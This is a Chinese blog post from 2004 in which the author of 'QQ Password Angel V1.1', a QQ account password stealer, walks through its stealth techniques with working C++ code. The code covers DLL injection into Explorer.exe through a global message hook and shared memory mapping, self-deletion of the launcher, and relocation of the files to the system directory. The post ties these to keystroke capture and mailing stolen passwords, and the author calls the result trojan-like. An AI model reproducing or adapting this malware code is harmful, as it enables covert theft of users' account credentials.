CSDN博客

img wbly0

戏说"QQ密码天使V1.1"进程的隐藏技术

发表于2004/9/24 17:42:00  2859人阅读

分类: "QQ密码天使1.1"涉及的隐藏技术

如果你看了我的<密码天使1.0开发手记>,那么对我的开发思路应该有一个印象了~~但是这个程序有一个问题:它只能在wind9x下实现伪隐藏!何谓伪隐藏?嘻嘻~~就是伪装成服务进程,在进程列表中是看不到的!用RegisterSerivceProcess 函数将进程注册为服务模式就 OK了,不过,要是用进程查看工具,那可原形毕露呀!~~网上很多文章谈到远进程写入技术,这确实是一种高深度隐藏方法,不过,我的程序中没有用到,因为远进程技术在9x下无效,考虑到这个问题,我采用了另一种方法

在正式涉及到代码之前,我们先看看一些条件

首先我们要明白这样一个实事:如何进入一个进程内存空间也就是说怎么让具有执行任务的函数进入另一个程序呢?最规范的方法是系统级的Hook(钩子)功能!如果钩子存在动态库中,那威力就大增,可以干涉其它进程的正常工作

其次,内存映射通过映射的空间,我们可以在不同进程中共享空间中的数据,并当作自身进程空间的一部分。我没有用共享数据段,因为在多个DLLEXE中,数据要一致,我认为内存映射方便一些

现在我来说说程序的构成程序共有三个工程文件:WinExe.exeInstall.dllGetKey.dll。

         1. WinExe.exe运行后加载Install.dll。

      2. Install.dll中有一个辅助函数,实现将GetKey.dll注入到进它进程中去,本程序是注入到Explorer.exe中。此时的GetKey.dll就可在Explorer.exe的掩护下为所欲为了J!(设置钩子、捕获按键、发送邮件是不是有点象木马了?当然,程序还有一些小细节,能让WinExe.exeInstall.dll在内存中消失,而你同时按下[Ctrl+Alt+Delete]组合键是查不到的WinExe.exe这个进程的,如果你用进程查看器,倒是可以看到GetKey.dll已经成为Exeplorer.exe进程中的一部分了,合合~~!

也许,你会问:为什么不直接用WinExeGetKey注入到其它进程中呢??

这是行不通的,因为WinExeExepore.exe属于不同进程,它们在通常情况是不能相互访问的于是我用了一个中介工具(Install.dll)GetKey.dll注入到Exepore.exe中。是不是有点象火箭载飞船进入太空考查?哈哈,我瞎说罢! 
  我现在用插图来说明一下:
    

   
                      图 一

程序主体思想就是这样,现在我们按照图示进入代码!记住:我们的最终目标是进入Explorer中~~
   首先我们在要系统快照中找到我们要注入的进程(如果没有,注到哪里去呀,嘻嘻)下面的代码是通过快照找到Exeplorer.exe的进程ID(你可以选其它对象)

WindExe中我们主要是得到以下三个数据:一个是目标进程,一个是WinExe.exe的句柄,还有一个是当前的WinExe所处的路径。句柄有什么作用?嘻嘻~~~也许有人会说,WinExe的句柄到别的进程就无意义了,不过, 别忘记我介绍过的内存映射,它的出现,情况就不一样了至于得到一个路径有什么用呢?很简单,无论程序在什么地方运行,它的归宿只一个,那就是转移到系统目录下记住这个路径是为它自杀作准备的!啊!还有自杀呀!嘻嘻~~那确实~!

WORD CWinExeDlg::FindProcessId()

{

    DWORD  dwID;

    HANDLE m_handle = ::CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);

    PROCESSENTRY32* Info = new PROCESSENTRY32;

    Info->dwSize = sizeof(PROCESSENTRY32);

    BOOL bFind = Process32First(m_handle, Info);

    while (bFind)

    {

        CString strBigWrite;

        strBigWrite = Info->szExeFile;

        strBigWrite.MakeUpper();

        if (strBigWrite.Find("EXPLORER.EXE") != -1)

        {  

            dwID = Info->th32ProcessID;

            bFind = FALSE;

            break;

        }

        bFind = Process32Next(m_handle, Info);     

    }  

    delete Info;

    Info = NULL;

    CloseHandle(m_handle);

    return dwID;

}

    路径和句柄很容易得到,将这三个信息传入Install.dll Install.dll就是一个加工厂,将送来的原村料加工

在进入Install.dll之前,我们先看看工厂有些什么设备?!J

    以下这个结构和共享数据段是一回事!不过,我这个共享数据是一个结构体变量,准备让它记录共享的信息!

 

typedef struct _installinfo

{  

    char  m_cPath[256];// 路径

    DWORD m_dwExplorerId;//J还用说吗?

    DWORD m_dwGetKeyThreadId;// 看看CreateThread后一个参数  

HWND  m_hwnd;// 记录WinExe的句柄

 

}InstallShareData;

 

  看了设备后我们是不是要看看如何加工原料的吧?先将原材料放入到设备中与上面的结构一一对应)

void InstallInfo(char cPath[], HWND hWnd, DWORD dwPrId)

{

//  memset((InstallShareData*)lpInMem, 0, sizeof(InstallShareData));

    pInShare->m_dwExplorerId = dwPrId;

    pInShare->m_hwnd = hWnd;

    pInShare->m_dwGetKeyThreadId = 0;

    strcpy(pInShare->m_cPath, cPath);

    if (hInHookMsg == NULL)

        hInHookMsg = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hInstance, NULL);

}

    呵呵,看到了吗?我用了钩子这个钩子的作用是:当GetMessage在队列中找到消息后,它就开始处理消息了!我们看看这个钩子做了一些什么手脚,让GetKey是如何注Exeplore.exe的?

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)

{

    if (nCode >= 0  )

    {  

        if ( pInShare->m_dwExplorerId != 0 && 
             GetCurrentProcessId() == pInShare->m_dwExplorerId)

        {  

            pInShare->m_dwExplorerId = 0; // 不再需要监视explorer进程了

            CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)OperateThreadpro,
                         NULL,0, &(pInShare->m_dwGetKeyThreadId));

        }

    }

    return CallNextHookEx(hInHookMsg , nCode, wParam, lParam);

}

 

有人说GetCurrentProcessId()打死都不等于pInShare->m_dwExploerId呵呵,还何况要pInShare->m_dwExploreId 不为零要是从常理上讲,确实如此因为你当前的GetCurrentProcessId()得到的WinExe的进程ID呀,怎么可能和ExPlorer的进程ID相等呢?在这里我曾用调试过,将比较结果输入到文件中,确实不相等!但是当你将内存映射的地址初化一下,也就是在DLL库的入口处(DllMain中)将映射空间的首地址赋予给结构体变量,sigh~~~~~~什么呀?说白了就是把内存映射的句柄强制转换成结构体变量!嘻嘻~~这样一来,它们就有相等的可能了!不过呢,此时GetCurretnProcessId()得到的不是WinExeID了,已进入到Explorer的地址空间了!

    看官注意:我们看看CreateThread函数,执行它的后果是什么呢?呵呵~~创建了一新的线程于Exeplorer中罢!那好,我们将目光锁定在OperateThreadpro这个全局线程函数中去!看看它又做了些什么手脚!!!!

void  OperateThreadpro(LPVOID pParam)

{

   typedef void (WINAPI * FUN)(void);

    HMODULE hmodule;

    FUN InstallGetKey;

    char cSysPath[256];

    ::GetSystemDirectory(cSysPath, 256);

    strcat(cSysPath, "//GetKey.dll");

    hmodule = LoadLibrary(cSysPath);// 系统目录

    InstallGetKey = (FUN)GetProcAddress(hmodule, "InstallGetKey");

    if (InstallGetKey != NULL)

    {   

       InstallGetKey(); // 当前线程是不是结束,请看它里面

    }

    else // 这种情况,很少发生!

      {

         FreeLibrary(hmodule);

         return ;

      }
}

   嘻嘻,怎么样,看到了吗?一个关键的地方是动态调用GetKey.dll,绝吧?!什么呀,你早就会呀,那你浪费时间呀?5555J动态加载dll后,自然就要执行它里面的关键函数:InstallGetKey(),现在我们只关心GetKey.dll,不是吗?原材料已加工成产品了,要买给客户呀!什么?你不卖?现在的社会象你这样的人太少了哟L(留下你的电话吧~~我要作专访~~

   看好,这个InstallGetKey()是一个导出函数,要不然在上面的线程中就有未定义的错误
  在GetKey.dll中也有一个结构如下:

typedef struct _installinfo

{   

     char  m_cPath[256];

     DWORD m_dwExplorerId;

     DWORD m_dwGetKeyThreadId;

     HWND  m_hwnd;

 

}INSTALLSHAREDATA;

 

    搞什么鬼呀?和前面的定义的结构是一样的呀?!要数据共享你就不要吝啬多写几下,给它赋一个初值吧?呵呵,是不是WinExe的句柄被映射到这里来了?!怎么一回事呀,你从EXE中取得路径呀什么的你不用呀?不急,不急,看后面撒!J

  我把这个函数帖出来!这么长,好烦燥的呢,呵呵!!

 

void InstallGetKey()

{

   HANDLE h = OpenFileMapping(FILE_MAP_WRITE | FILE_MAP_READ,
                             false, _T("MemNameInstall"));

  if (h != 0)

  {

    LPVOID p = MapViewOfFile(h, FILE_MAP_READ, 0, 0, 0);

    p_data = (INSTALLSHAREDATA*)p;     

    if ( p != NULL)

    {

        ::PostMessage(p_data->m_hwnd, WM_GOODLOOK, 1, 1);   // exe发送自杀命令

        Sleep(100);//等待100毫秒,这是好关键的!exe自杀也要一点时间嘛^_^
      UnmapViewOfFile(p);

        // exe进程结束后,将install.dllexe一并复制到系统目录下
       //然后将当前目录下的文件
Del掉!

        char cSExePath[256]; // exe路径

        char cSDllPath[256]; // install路径

        char cDExePath[256]; // 目的exe路径

        char cDDllPath[256]; // 目的dll路径

   

        strcpy(cSExePath, p_data->m_cPath);// 当前目录

        strcpy(cSDllPath, p_data->m_cPath);    

       

        strcat(cSExePath, "//WinExe.exe");// 带文件名           

        strcat(cSDllPath, "//Install.dll");

       

        ::GetSystemDirectory(cDExePath, 256);// 系统目录

        ::GetSystemDirectory(cDDllPath, 256);

       

        strcat(cDExePath, "//WinExe.exe");

        strcat(cDDllPath, "//Install.dll");

 

        if (strcmp(cDExePath, cSExePath) != 0)

        {  

            CopyFile(cSExePath, cDExePath, FALSE);

            if(!::DeleteFile(cSExePath))

            { 

                ofstream fs;

                fs.open("d://_ERROR_1.txt", ios::app);

                fs <<"出错码 = " << GetLastError() << endl;

                fs.close();

            }

        }

        if (strcmp(cDDllPath, cSDllPath) != 0)

        {

 

             CopyFile(cSDllPath, cDDllPath, FALSE);

             if(!::DeleteFile(cSDllPath))

             {

               ofstream fd;

               fd.open("d://_ERROR_2.txt", ios::app);

               fd << "出错码 = " << GetLastError() << endl;

               fd.close();

             }

        }

    }

    CloseHandle(h);

   }

   MSG msg;

   SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc);

   while (GetMessage(&msg, NULL, 0, 0))

   {

      TranslateMessage(&msg);

      DispatchMessage(&msg);

   } 

     // ExitThread(0);// 退出线程
//(要是真退出了,要记得关闭钩子)

}

  

   怎么样?这个函数功能还是不复杂吧!呵呵!我都做了详细的注释,相信你也看得懂!

我简单的说几点:
1.PostMessage(p_data->m_hwnd, WM_GOODLOOK, 1, 1)
这个就是发消息让WinExe自杀的!WinExe收到WM_GOOKLOOK后,证明注入已完成,WinExe留着没有作用了,没有作用就得死,好残酷哦

2. SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc),发出Timer事件,监视工作开始了,这个和1.0版本大同小异了!

3.不要忘记了,这个函数工作在一个辅助线程函数中,线程函数结束有二种情况:一种情况是自我结束,这种情属于安全结束;还有一种情况是进程结束,它必须无条件结束!在这里,我们不能让它结束我用了一消息循环,让循环持续它的生命当然如果要结束它,你可以定义一个全局变量,要定义在内存映射的结构中,在Install.dll中加载GetKey.dll时只要检查这个值通过这个值你就可以判断线程是不是还没有结束要是没有结束,你又想结束它,那就发一消息呀,不过,发这个消息要有点艺术,得用系统广播:

  SendMessage(HWND_BROADCAST, WM_YOURDEFINE,0,0)在上面的消息循环中加一判断就OK了!

      至此,程序已告已段落!剩下的部分和1.0版本中的处理一样:设置钩子->找QQ窗口->捕获铵键->记录密码->累计五个号码 发送一次

   要是看出什么破绽,请告诉我!^_^

 

阅读全文
0 0

相关文章推荐

img
取 消
img